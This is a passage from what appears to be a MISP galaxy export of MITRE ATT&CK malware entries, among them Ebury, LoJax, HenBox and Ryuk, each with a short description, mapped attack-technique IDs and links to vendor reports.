uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

Table 5073. Table References
Links
https://attack.mitre.org/software/S0396
https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/

CoinTicker - S0369

[CoinTicker](https://attack.mitre.org/software/S0369) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.(Citation: CoinTicker 2019)

The tag is: misp-galaxy:mitre-malware="CoinTicker - S0369"

CoinTicker - S0369 is also known as:

CoinTicker

View relationships graph

CoinTicker - S0369 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1553.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

Table 5074. Table References
Links
https://attack.mitre.org/software/S0369
https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/

Ebury - S0377

[Ebury](https://attack.mitre.org/software/S0377) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).(Citation: ESET Ebury Feb 2014)(Citation: BleepingComputer Ebury March 2017)(Citation: ESET Ebury Oct 2017)

The tag is: misp-galaxy:mitre-malware="Ebury - S0377"

Ebury - S0377 is also known as:

Ebury

View relationships graph

Ebury - S0377 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pluggable Authentication Modules - T1556.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

Table 5075. Table References
Links
https://attack.mitre.org/software/S0377
https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/
https://www.bleepingcomputer.com/news/security/russian-hacker-pleads-guilty-for-role-in-infamous-linux-ebury-malware/
https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/

KeyBoy - S0387

[KeyBoy](https://attack.mitre.org/software/S0387) is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: PWC KeyBoys Feb 2017)

The tag is: misp-galaxy:mitre-malware="KeyBoy - S0387"

KeyBoy - S0387 is also known as:

KeyBoy

View relationships graph

KeyBoy - S0387 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

Table 5076. Table References
Links
https://attack.mitre.org/software/S0387
https://citizenlab.ca/2016/11/parliament-keyboy/
https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html
https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/

LoJax - S0397

[LoJax](https://attack.mitre.org/software/S0397) is a UEFI rootkit used by [APT28](https://attack.mitre.org/groups/G0007) to persist remote access software on targeted systems.(Citation: ESET LoJax Sept 2018)

The tag is: misp-galaxy:mitre-malware="LoJax - S0397"

LoJax - S0397 is also known as:

LoJax

View relationships graph

LoJax - S0397 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Firmware - T1019" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"

Table 5077. Table References
Links
https://attack.mitre.org/software/S0397
https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf

YAHOYAH - S0388

[YAHOYAH](https://attack.mitre.org/software/S0388) is a Trojan used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) as a second-stage backdoor.(Citation: TrendMicro TropicTrooper 2015)

The tag is: misp-galaxy:mitre-malware="YAHOYAH - S0388"

YAHOYAH - S0388 is also known as:

YAHOYAH

View relationships graph

YAHOYAH - S0388 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 5078. Table References
Links
https://attack.mitre.org/software/S0388
https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf

HyperBro - S0398

[HyperBro](https://attack.mitre.org/software/S0398) is a custom in-memory backdoor used by [Threat Group-3390](https://attack.mitre.org/groups/G0027).(Citation: Unit42 Emissary Panda May 2019)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)

The tag is: misp-galaxy:mitre-malware="HyperBro - S0398"

HyperBro - S0398 is also known as:

HyperBro

View relationships graph

HyperBro - S0398 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 5079. Table References
Links
https://attack.mitre.org/software/S0398
https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
https://securelist.com/luckymouse-hits-national-data-center/86083/
https://thehackernews.com/2018/06/chinese-watering-hole-attack.html

JCry - S0389

[JCry](https://attack.mitre.org/software/S0389) is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.(Citation: Carbon Black JCry May 2019)

The tag is: misp-galaxy:mitre-malware="JCry - S0389"

JCry - S0389 is also known as:

JCry

View relationships graph

JCry - S0389 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 5080. Table References
Links
https://attack.mitre.org/software/S0389
https://www.carbonblack.com/2019/05/14/cb-tau-threat-intelligence-notification-jcry-ransomware-pretends-to-be-adobe-flash-player-update-installer/

Pallas - S0399

[Pallas](https://attack.mitre.org/software/S0399) is mobile surveillanceware that was custom-developed by [Dark Caracal](https://attack.mitre.org/groups/G0070).(Citation: Lookout Dark Caracal Jan 2018)

The tag is: misp-galaxy:mitre-malware="Pallas - S0399"

Pallas - S0399 is also known as:

Pallas

View relationships graph

Pallas - S0399 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"

Table 5081. Table References
Links
https://attack.mitre.org/software/S0399
https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

ShimRat - S0444

[ShimRat](https://attack.mitre.org/software/S0444) has been used by the suspected China-based adversary [Mofang](https://attack.mitre.org/groups/G0103) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "[ShimRat](https://attack.mitre.org/software/S0444)" comes from the malware’s extensive use of Windows Application Shimming to maintain persistence. (Citation: FOX-IT May 2016 Mofang)

The tag is: misp-galaxy:mitre-malware="ShimRat - S0444"

ShimRat - S0444 is also known as:

ShimRat

View relationships graph

ShimRat - S0444 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

Table 5082. Table References
Links
https://attack.mitre.org/software/S0444
https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf

HenBox - S0544

[HenBox](https://attack.mitre.org/software/S0544) is Android malware that attempts to only execute on Xiaomi devices running the MIUI operating system. [HenBox](https://attack.mitre.org/software/S0544) has primarily been used to target Uyghurs, a minority Turkic ethnic group.(Citation: Palo Alto HenBox)

The tag is: misp-galaxy:mitre-malware="HenBox - S0544"

HenBox - S0544 is also known as:

HenBox

View relationships graph

HenBox - S0544 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native Code - T1575" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command-Line Interface - T1605" with estimative-language:likelihood-probability="almost-certain"

Table 5083. Table References
Links
https://attack.mitre.org/software/S0544
https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/

Cadelspy - S0454

[Cadelspy](https://attack.mitre.org/software/S0454) is a backdoor that has been used by [APT39](https://attack.mitre.org/groups/G0087).(Citation: Symantec Chafer Dec 2015)

The tag is: misp-galaxy:mitre-malware="Cadelspy - S0454"

Cadelspy - S0454 is also known as:

Cadelspy

View relationships graph

Cadelspy - S0454 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 5084. Table References
Links
https://attack.mitre.org/software/S0454
https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

ObliqueRAT - S0644

[ObliqueRAT](https://attack.mitre.org/software/S0644) is a remote access trojan, similar to [Crimson](https://attack.mitre.org/software/S0115), that has been in use by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2020.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)

The tag is: misp-galaxy:mitre-malware="ObliqueRAT - S0644"

ObliqueRAT - S0644 is also known as:

ObliqueRAT

View relationships graph

ObliqueRAT - S0644 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

Table 5085. Table References
Links
https://attack.mitre.org/software/S0644
https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html
https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

SYSCON - S0464

[SYSCON](https://attack.mitre.org/software/S0464) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://attack.mitre.org/software/S0464) has been delivered by the [CARROTBALL](https://attack.mitre.org/software/S0465) and [CARROTBAT](https://attack.mitre.org/software/S0462) droppers.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)

The tag is: misp-galaxy:mitre-malware="SYSCON - S0464"

SYSCON - S0464 is also known as:

SYSCON

View relationships graph

SYSCON - S0464 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 5086. Table References
Links
https://attack.mitre.org/software/S0464
https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/
https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

Ryuk - S0446

[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)

The tag is: misp-galaxy:mitre-malware="Ryuk - S0446"

Ryuk - S0446 is also known as:

Ryuk

View relationships graph

Ryuk - S0446 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
